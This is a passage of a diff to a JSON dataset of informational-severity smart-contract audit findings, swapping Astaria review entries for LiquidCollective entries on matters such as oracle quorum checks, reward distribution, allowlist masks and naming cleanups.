- "title": "A redundant if block can be removed from PublicVault._afterCommitToLien", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In PublicVault._afterCommitToLien, we have the following if block: if (s.last == 0) { s.last = block.timestamp.safeCastTo40(); } This if block is redundant, since regardless of the value of s.last, a few lines before _accrue(s) would update the s.last to the current timestamp.", + "title": "Quorum could be higher than the number of oracles, DOSing the Oracle contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of Oracle.setQuorum only checks if the _newQuorum input parameter is not 0 or equal to the current quorum value. By setting a quorum higher than the number of oracle members, no quorum could be reached for the current or future slots.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Private vaults' deposit endpoints can be potentially simplifed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "A private vault's deposit function can be called directly or indirectly using the ROUTER() (either way by anyone) and we have the following require statement: require( s.allowList[msg.sender] || (msg.sender == address(ROUTER()) && s.allowList[receiver]) ); If the ROUTER() is the AstariaRouter implementation of IAstariaRouter, then it inherits from ERC4626RouterBase and ERC4626Router which allows anyone to call into deposit of this private vault using: depositToVault depositMax ERC4626RouterBase.deposit Thus if anyone of the above functions is called through the ROUTER(), msg.sender == address(ROUTER() will be true. Also, note that when private vaults are created using the newVault the msg.sender/owner along the delegate are added to the allowList and allowlist is enabled. And since there is no bookkeeping here for the receiver, except only the require statement, that means Only the owner or the delegate of this private vault can call directly into deposit or Anyone else can set the address to parameter of one of those 3 endpoints above to owner or delegate to deposit assets (wETH in the current implementation) into the private vault. And all the assets can be withdrawn by the owner only.", + "title": "ConsensusLayerDepositManager.depositToConsensusLayer should be called only after a quorum has been reached to avoid rewarding validators that have not performed during the frame", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Alluvial is not tracking timestamps or additional information of some actions that happen on-chain like when operator validator is funded on the beacon chain. when an operator is added. when validators are added or removed. when a quorum is reached. when rewards/penalties/slashes happen and which validator is involved. and so on... 46 By not having these enriched informations it could happen that validators that have not contributed to a frame will still get rewards and this could be not fair to other validators that have contributed to the overall balance by working and bringing rewards. Let's make an example: we have 10 operators with 1k validators each at the start of a frame. At some point during the very end of the frame validato_10 get approved 9k validators and all of them get funded. Those validators only participated a small fraction in the production of the rewards. But because there's no way to track these timing and because oracles do not know anything about these (they just need to report the balance and the number of validators during the frame) they will report and arrive to a quorum of reportBeacon(correctEpoch, correctAmountOfBalance, 21_000) that will trigger the OracleManagerV1.setBeaconData. The contract check that 21_000 > DepositedValidatorCount.get() will pass and _onEarnings is called. Let's not consider the math involved in the process of calculating the number of shares to be distributed based on the staked balance delta, let's say that because of all the increase in capital Alluvial will call _rewardOperators(1_- 000_000); distributing 1_000_000 shares to operators based on the number of validators that produced that reward. Because as we said we do not know how much each validator has contributed, those shares will be contributed in the same way to operators that could have not contributed at all to the epoch. This is true for both scenarios where validators that have joined or exited the beacon chain not at the start of the epoch where the last quorum was set.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "The require statement in decreaseEpochLienCount can be more strict", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "decreaseEpochLienCount has the following require statement that limits who can call into it: require( msg.sender == address(ROUTER()) || msg.sender == address(LIEN_TOKEN()) ); So only, the ROUTER() and LIEN_TOKEN() are allowed to call into. But AstariaRouter never calls into this function.", + "title": "Document the decision to include executionLayerFees in the logic to trigger _onEarnings to dis- tribute rewards to Operators and Treasury", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The setBeaconData function from OracleManager contract is called when oracle members have reached a quorum. The function after checking that the report data respects some integrity check performs a check to distribute rewards to operators and treasury if needed: uint256 executionLayerFees = _pullELFees(); if (previousValidatorBalanceSum < _validatorBalanceSum + executionLayerFees) { _onEarnings((_validatorBalanceSum + executionLayerFees) - previousValidatorBalanceSum); } The delta between _validatorBalanceSum and previousValidatorBalanceSum is the sum of all the rewards, penalties and slashes that validators have accumulated during the validation work of one or multiple frames. By adding executionLayerFees to the check, it means that even if the validators have performed poorly (the sum of rewards is less than the sum of penalties+slash) they could still get rewards if executionLayerFees is greater than the negative delta of newSum-prevSum. If we look at the natspec of the _onEarnings it seems that only the validator's balance (without fees) should be used in the if check. 47 /// @notice Handler called if the delta between the last and new validator balance sum is positive /// @dev Must be overriden /// @param _profits The positive increase in the validator balance sum (staking rewards) function _onEarnings(uint256 _profits) internal virtual;", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "amount is not used in _afterCommitToLien", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "amount is not used in _afterCommitToLien to update/decrement s.yIntercept, because even though assets have been transferred out of the vault, they would still need to be paid back and so the net ef- fect on s.yIntercept (that is used in the calculation of the total virtual assets) is 0.", + "title": "Consider documenting how and if funds from the execution layer fee recipient are considered inside the annualAprUpperBound and relativeLowerBound boundaries.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "When oracle members reach a quorum, the _pushToRiver function is called. Alluvial is performing some sanity check to prevent malicious oracle member to report malicious beacon data. Inside the function, uint256 prevTotalEth = IRiverV1(payable(address(riverAddress))).totalUnderlyingSupply(); riverAddress.setBeaconData(_validatorCount, _balanceSum, bytes32(_epochId)); uint256 postTotalEth = IRiverV1(payable(address(riverAddress))).totalUnderlyingSupply(); uint256 timeElapsed = (_epochId - LastEpochId.get()) * _beaconSpec.slotsPerEpoch * _beaconSpec.secondsPerSlot; ,! _sanityChecks(postTotalEth, prevTotalEth, timeElapsed); function _sanityChecks(uint256 _postTotalEth, uint256 _prevTotalEth, uint256 _timeElapsed) internal ,! view { if (_postTotalEth >= _prevTotalEth) { uint256 annualAprUpperBound = BeaconReportBounds.get().annualAprUpperBound; if ( uint256(10000 * 365 days) * (_postTotalEth - _prevTotalEth) > annualAprUpperBound * _prevTotalEth * _timeElapsed ) { revert BeaconBalanceIncreaseOutOfBounds(_prevTotalEth, _postTotalEth, _timeElapsed, ,! annualAprUpperBound); } } else { uint256 relativeLowerBound = BeaconReportBounds.get().relativeLowerBound; if (uint256(10000) * (_prevTotalEth - _postTotalEth) > relativeLowerBound * _prevTotalEth) { revert BeaconBalanceDecreaseOutOfBounds(_prevTotalEth, _postTotalEth, _timeElapsed, relativeLowerBound); } ,! } } Both prevTotalEth and postTotalEth call SharesManager.totalUnderlyingSupply() that returns the value from Inside those balance is also included the amount of fees that are pulled from the River._assetBalance(). ELFeeRecipient (Execution Layer Fee Recipient). Alluvial should document how and if funds from the execution layer fee recipient are also considered inside the annualAprUpperBound and relativeLowerBound boundaries. 48", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Use modifier", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Highlighted code have require checks on msg.sender which can be converted to modifiers. For instance: require(address(msg.sender) == s.guardian);", + "title": "Allowlist.allow allows arbitrary values for _statuses input", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of allow does not check if the value inside each _statuses item is a valid value or not. The function can be called by both the administrator or the allower (roles authorized to manage the user permissions) that can specify arbitrary values to be assigned to the corresponding _accounts item. The user's permissions handled by Allowlist are then used by the River contract in different parts of the code. Those permissions inside the River contracts are a limited set of permissions that could not match what the allower /admin of the Allowlist has used to update a user's permission when the allow function was called.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Prefer SafeCastLib for typecasting", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Highlighted code above does typecasting of several constant values. In case, some value doesn't fit in the type, this typecasting will silently ignore the higher order bits although that's currently not the case, but it may pose a risk if these values are changed in future.", + "title": "Consider exploring a way to update the withdrawal credentials and document all the possible scenarios", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The withdrawal credentials is currently set when River.initRiverV1 is called. The func- tion will internally call ConsensusLayerDepositManager.initConsensusLayerDepositManagerV1 that will perform WithdrawalCredentials.set(_withdrawalCredentials); After initializing the withdrawal credentials, there's no way to update it and change it. The withdrawal cre- dentials is a key part of the whole protocol and everything that concern it should be well documented including all the worst-case scenario What if the withdrawal credentials is lost? What if the withdrawal credentials is compromised? What if the withdrawal credentials must be changed (lost, compromised or simply the wrong one has been submitted)? What should be implemented inside the Alluvial logic to use the new withdrawal creden- tials for the operator's validators that have not been funded yet (the old withdrawal credentials has not been sent to the Deposit contract)? Note that currently there's seem to be no way to update the withdrawal credentials for a validator already submitted to the Deposit contract.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Rename Multicall to Multidelegatecall", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Multicall.sol lets performs multiple delegatecalls. Hence, the name Multicall is not suitable. The contract and the file should be named Multidelegatecall.", + "title": "Oracle contract allows members to skip frames and report them (even if they are past) one by one or all at once", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of reportBeacon allows oracle members to skip frames (255 epochs) and report them (even if they are past) one by one or all at once. Let's assume that members arrived to a quorum for epochId_X. When quorum is reached, _pushToRiver is called, and it will update the following properties: clean all the storage used for member reporting. set ExpectedEpochId to epochId_X + 255. set LastEpochId to epochId_X. With this context, let's assume that members decide to wait 30 frames (30 days) or that for 30 days they cannot arrive at quorum. At the new time, the new epoch would be epochId_X + 255 * 30 The following scenarios can happen: 1) Report at once all the missed epochs Instead of reporting only the current epoch (epochId_X + 255 * 30), they will report all the previous \"skipped\" epochs that are in the past. In this scenario, ExpectedEpochId contains the number of the expected next epoch assigned 30 days ago from the previous call to _pushToRiver. In reportBeacon if the _epochId is what the system expect (equal to Expect- edEpochId) the report can go on. So to be able to report all the missing reports of the \"skipped\" frames the member just need to call in a se- quence reportBeacon(epochId_X + 255, ...), reportBeacon(epochId_X + 255 + 255, ...) + .... + report- Beacon(epochId_X + 255 * 30, ...) 2) Report only the last epoch In this scenario, they would call directly reportBeacon(epochId_X + 255 * 30, ...). _pushToRiver call _sani- tyChecks to perform some checks as do not allow changes in the amount of staked ether that are below or above some bounds. The call that would be made is _sanityChecks(oracleReportedStakedBalance, prevTotalEth, timeElapsed) where timeElapsed is calculated as uint256 timeElapsed = (_epochId - LastEpochId.get()) * _beacon- Spec.slotsPerEpoch * _beaconSpec.secondsPerSlot; So, time elapsed is the number of seconds between the reported epoch and the LastEpochId. But in this scenario, LastEpochId has the old value from the previous call to _pushToRiver made 30 days ago that will be epochId_X. Because of this, the check made inside _sanityChecks for the upper bound would be more relaxed, allowing a wider spread between oracleReportedStakedBalance and prevTotalEth", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "safeTransferFrom() without the data argument can be used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Highlighted code above sends empty data over an external call via ERC721.safeTransferFrom(from, to, tokenId, data): IERC721(underlyingAsset).safeTransferFrom( address(this), releaseTo, assetId, \"\" ); data can be removed since ERC721.safeTransferFrom(from, to, tokenId) sets empty data too.", + "title": "Consider renaming OperatorResolution.active to a more meaningful name", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The name active in the struct OperatorResolution could be misleading because it can be confused with the fact that an operator (the struct containing the real operator information is Operator ) is active or not. The value of OperatorResolution.active does not represent if an operator is active, but is used to know if the index associated to the struct's item (OperatorResolution.index) is used or not.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Fix documentation that updateVaultAfterLiquidation can be called by LIEN_TOKEN, not ROUTER", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The function has the correct validation that it can only be called by LIEN_TOKEN(), but the comment says it can only be called by ROUTER(). require(msg.sender == address(LIEN_TOKEN())); // can only be called by router", + "title": "lsETH and WlsETH's name() functions return inconsistent name.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "lsETH.name() is River Ether, while WlsETH.name() is Wrapped Alluvial Ether.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Declare event and constants at the beginning", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Events and constants are generally declared at the beginning of a smart contract. However, for the highlighted code above, that's not the case.", + "title": "Rename modifiers to have consistent naming and patterns only.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The modifiers ifGovernor and ifGovernorOrExecutor in Firewall.sol have a different naming conventions and also logical patterns.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Rename Vault to PrivateVault", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Vault contract is used to represent private vaults.", + "title": "OperatorResolution.active might be a redundant struct field which can be removed.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The value of active stays true once it has been set true for a given index. This is especially true since the only call to Operators.set is from OperatorsRegistryV1.addOperator which does not override values for already registered names.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Remove comment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Comment at line WithdrawProxy.sol#L229 can be removed: if ( block.timestamp < s.finalAuctionEnd // || s.finalAuctionEnd == uint256(0) ) { The condition in comments is always false as the code already reverts in that case.", + "title": "The expression for selectedOperatorAvailableKeys in OperatorsRegistry can be simplified.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "tors[selectedOperatorIndex].keys. Since the places that the limit has been set with a value other than 0 has checks against going above keys bound: operators[selectedOperatorIndex].limit is always less than or equal OperatorsRegistry.1.sol#L250-L252 if (_newLimits[idx] > operator.keys) { revert OperatorLimitTooHigh(_newLimits[idx], operator.keys); } OperatorsRegistry.1.sol#L324-L326 if (keyIndex >= operator.keys) { revert InvalidIndexOutOfBounds(); } OperatorsRegistry.1.sol#L344-L346 52 if (_indexes[_indexes.length - 1] < operator.limit) { operator.limit = _indexes[_indexes.length - 1]; }", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "WithdrawProxy and PrivateVault symbols are missing hyphens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The symbol for the WithdrawProxy token is missing a hyphen after the W, which will make the name AST-W0x... instead of AST-W-0x.... Similarly, the symbol for the Private Vault token (in Vault.sol) is missing a hyphen after the V.", - "labels": [ + "title": "The unused constant DELTA_BASE can be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The constant DELTA_BASE in BeaconReportBounds is never used.", + "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Lien cannot be bought out after stack.point.end", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The _getRemainingInterest function reverts with Panic(0x11) when block.timestamp > stack.point.end.", + "title": "Remove unused modifiers", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The modifier active(uint256 _index) is not used in the project.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Inconsistent strictness of inequalities in isValidRefinance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In isValidRefinance, we check that either: a) newRate < maxNewRate && newEnd >= oldEnd b) newEnd - oldEnd >= minDurationIncrease && newRate <= oldRate We should be consistent in whether we're enforcing the changes are strict inequalities or non-strict inequalities.", + "title": "Modifier names do not follow the same naming patterns", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The modifier names do not follow the same naming patterns in OperatorsRegistry.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Clarify comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Few comments are not clear on what they are referring to: zone: address(this), // 0x20 ... conduitKey: s.CONDUIT_KEY, // 0x120", + "title": "In AllowlistV1.allow the input variable _statuses can be renamed to better represent that values it holds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "In AllowlistV1.allow the input variable _statuses can be renamed to better represent the values it holds. _statuses is a bitmap where each bit represents a particular action that a user can take.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Remove unused files", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "CallUtils.sol is not used anywhere in the codebase.", + "title": "riverAddress can be renamed to river and we can avoid extra interface casting", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "riverAddress's name suggest that it is only an address. Although it is an address with the IRiverV1 attached to it. Also, we can avoid unnecessary casting of interfaces.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Document privileges and entities holding these privileges", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "There are certain privileged functionalities in the codebase (recognized through requiresAuth mod- ifier). Currently, we have to refer to tests to identify the setup.", + "title": "Define named constants for numeric literals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "In _sanitychecks there 2 numeric literals 10000 and 365 days used: uint256(10000 * 365 days) * (_postTotalEth - _prevTotalEth) ... if (uint256(10000) * (_prevTotalEth - _postTotalEth) > relativeLowerBound * _prevTotalEth) {", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Document and ensure that maximum number of liens should not be set greater than 256", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "Maximum number of liens in a stack is currently set to 5. While paying for a lien, the index in the stack is casted to uint8. This makes the implicit limit on maximum number of liens to be 256.", + "title": "Move memberIndex and ReportsPositions checks at the beginning of the OracleV1.reportBeacon function.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The checks for memberIndex == -1 and ReportsPositions.get(uint256(memberIndex)) happen in the middle of reportBeacon after quite a few calculations are done.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "transferWithdrawReserve() can return early when the current epoch is 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "If s.currentEpoch == 0, s.currentEpoch - 1 will wrap around to type(uint256).max and we will most probably will drain assets into address(0) in the following block: unchecked { s.withdrawReserve -= WithdrawProxy(withdrawProxy) .drain( s.withdrawReserve, s.epochData[s.currentEpoch - 1].withdrawProxy ) .safeCastTo88(); } But this cannot happen since in the outer if block the condition s.withdrawReserve > 0 indirectly means that s.currentEpoch > 0. The indirect implication above regarding the 2 conditions stems from the fact that s.withdrawReserve has only been set in transferWithdrawReserve() function or processEpoch(). In transferWithdrawReserve() function 78 it assumes a positive value only when s.currentEpoch > uint64(0) and in processEpoch() at the end we are incrementing s.currentEpoch.", + "title": "Document what incentivizes the operators to run their validators when globalFee is zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "If GlobalFee could be 0, then neither the treasury nor the operators earn rewards. What factor would motivate the operators to keep their validators running?", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "2 of the inner if blocks of processEpoch() check for a condition that has already been checked by an outer if block", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The following 2 if block checks are redundant: if (address(currentWithdrawProxy) != address(0)) { currentWithdrawProxy.setWithdrawRatio(s.liquidationWithdrawRatio); } uint256 expected = 0; if (address(currentWithdrawProxy) != address(0)) { expected = currentWithdrawProxy.getExpected(); } Since the condition address(currentWithdrawProxy) != address(0) has already been checked by an outer if block.", + "title": "Document how Alluvial plans to prevent institutional investors and operators get into business directly and bypass using the River protocol.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Since the list of operators and also depositors can be looked up from the information on-chain, what would prevent Institutional investors (users) and the operators to do business outside of River? Is there going to be an off-chain legal contract between Alluvial and these other entities to prevent this scenario?", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "General formatting suggestions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": " PublicVault.sol#L283 : there are extra sourounding paranthesis", + "title": "Document how operator rewards will be distributed if OperatorRewardsShare is zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "If OperatorRewardsShare could be 0, then the operators won't earn rewards. What factor would motivate the operators to keep their validators running? Sidenote: Other incentives for the operators to keep their validators running (if their reward share portion is 0) would be some sort of MEV or block proposal/attestation bribes. Related: Avoid to waste gas distributing rewards when the number of shares to be distributed is zero", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Identical collateral check is performed twice in _createLien", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "In _createLien, a check is performed that the collateralId of the new lien matches the collateralId of the first lien on the stack. if (params.stack.length > 0) { if (params.lien.collateralId != params.stack[0].lien.collateralId) { revert InvalidState(InvalidStates.COLLATERAL_MISMATCH); } } This identical check is performed twice (L383-387 and L389-393).", + "title": "Current operator reward distribution does not favor more performant operators", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Reward shares are distributed based on the fraction of the active funded non-stopped validators owned by an operator. This distribution of shares does not promote the honest operation of validators to the fullest extent. Since the oracle members don't report the delta in the balance of each validator, it is not possible to reward operators/validators that have been performing better than the rest. Also if a high-performing operator or operators were the main source of the beacon balance sum and if they had enough ETH to initially deposit into the ETH2.0 deposit contract on their own, they could have made more profit that way versus joining as an operator in the River protocol.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "checkAllowlistAndDepositCap modifer can be defined to consolidate some of the mint and deposit logic for public vaults", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "The following code snippet has been used for both mint and deposit endpoints of a public vault: VIData storage s = _loadVISlot(); if (s.allowListEnabled) { require(s.allowList[receiver]); } uint256 assets = totalAssets(); if (s.depositCap != 0 && assets >= s.depositCap) { revert InvalidState(InvalidStates.DEPOSIT_CAP_EXCEEDED); }", + "title": "TRANSFER_MASK == 0 which causes a no-op.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "TRANSFER_MASK is a named constant defined as 0 (River.1.sol#L37). Like the other masks DEPOSIT_- MASK and DENY_MASK which supposed to represent a bitmask, on the first look, you would think TRANSFER_MASK would need to also represent a bitmask. But if you take a look at _onTransfer: function _onTransfer(address _from, address _to) internal view override { IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_from, TRANSFER_MASK); // this call reverts if unauthorized or denied IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_to, TRANSFER_MASK); // this call reverts if unauthorized or denied ,! ,! } This would translate into calling onlyAllowed with the: IAllowlistV1(AllowlistAddress.get()).onlyAllowed(x, 0); Now if we look at the onlyAllowed function with these parameters: function onlyAllowed(x, 0) external view { uint256 userPermissions = Allowlist.get(x); if (userPermissions & DENY_MASK == DENY_MASK) { revert Denied(_account); } if (userPermissions & 0 != 0) { // <--- ( x & 0 != 0 ) == false revert Unauthorized(_account); } } Thus if the _from, _to addresses don't have their DENY_MASK set to 1 they would not trigger a revert since we would never step into the 2nd if block above when TRANSFER_MASK is passed to these functions. The TRANSFER_MASK is also used in _onDeposit: IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_depositor, DEPOSIT_MASK + TRANSFER_MASK); // DEPOSIT_MASK + TRANSFER_MASK == DEPOSIT_MASK ,! IAllowlistV1(AllowlistAddress.get()).onlyAllowed(_recipient, TRANSFER_MASK); // like above in ,! `_onTransfer`", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Document why bytes4(0xffffffff) is chosen when CollateralToken acting as a Seaport zone to signal invalid orders", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "bytes4(0xffffffff) to indicate a Seaport order using this zone is not a valid order.", + "title": "Reformat numeric literals with many digits for better readability.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Reformat numeric literals with many digits into a more readable form.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "CollateralToken.onERC721Received's use of depositFor stack variable is redundant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "If we follow the logic of assigning values to depositFor in CollateralToken.onERC721Received, we notice that it will end up being from_. So its usage is redundant.", + "title": "Firewall should follow the two-step approach present in River when transferring govern address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "Both River and OperatorsRegistry follow a two-step approach to transfer the ownership of the contract. 1) Propose a new owner storing the address in a pendingAdmin variable 2) The pending admins accept the new role by actively calling acceptOwnership This approach makes this crucial action much safer because 1) Prevent the admin to transfer ownership to address(0) given that address(0) cannot call acceptOwnership 2) Prevent the admin to transfer ownership to an address that cannot \"admin\" the contract if they cannot call acceptOwnership. For example, a contract do not have the implementation to at least call acceptOwnership. 3) Allow the current admin to stop the process by calling transferOwnership(address(0)) if the pending admin has not called acceptOwnership yet The current implementation does not follow this safe approach, allowing the governor to directly transfer the gov- ernor role to a new address.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "onlyOwner modifier can be defined to simplify the codebase", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "releaseToAddress checks whether the msg.sender is an owner of a collateral. CollateralToken already has a modifier onlyOwner(...), so the initial check in releaseToAddress can be delegated to the modifier.", + "title": "OperatorRegistry.removeValidators is resetting the limit (approved validators) even when not needed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", + "body": "The current implementation of removeValidators allow an admin or node operator to remove val- idators, passing to the function the list of validator's index to be removed. Note that the list of indexes must be ordered DESC. At the end of the function, we can see these checks if (_indexes[_indexes.length - 1] < operator.limit) { operator.limit = _indexes[_indexes.length - 1]; } That reset the operator's limit to the lower index value (this to prevent that a not approved key get swapped to a position inside the limit). The issue with this implementation is that it is not considering the case where all the operator's validators are already approved by Alluvial. In this case, if an operator removes the validator with the lower index, all the other validators get de-approved because the limit will be set to the lower limit. Consider this scenario: 59 op.limit = 10 op.keys = 10 op.funded = 0 This mean that all the validators added by the operator have been approved by Alluvial and are safe (keys == limit). If the operator or Alluvial call removeValidators([validatorIndex], [0]) removing the validator at index 0 this will swap the validator_10 with validator_0. set the limit to 0 because 0 < 10 (_indexes[_indexes.length - 1] < operator.limit). The consequence is that even if all the validators present before calling removeValidators were \"safe\" (because approved by Alluvial) the limit is now 0 meaning that all the validators are not \"safe\" anymore and cannot be selected by pickNextValidators.", "labels": [ "Spearbit", - "Astaria", + "LiquidCollective", "Severity: Informational" ] }, { - "title": "Document liquidator's role for the protocol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", - "body": "When a lien's term end (stack.point.end <= block.timestamp), anyone can call the liquidate on AstariaRouter. There is no restriction on the msg.sender. The msg.sender will be set as the liquidator and if: The Seaport auction ends (3 days currently, set by the protocol), 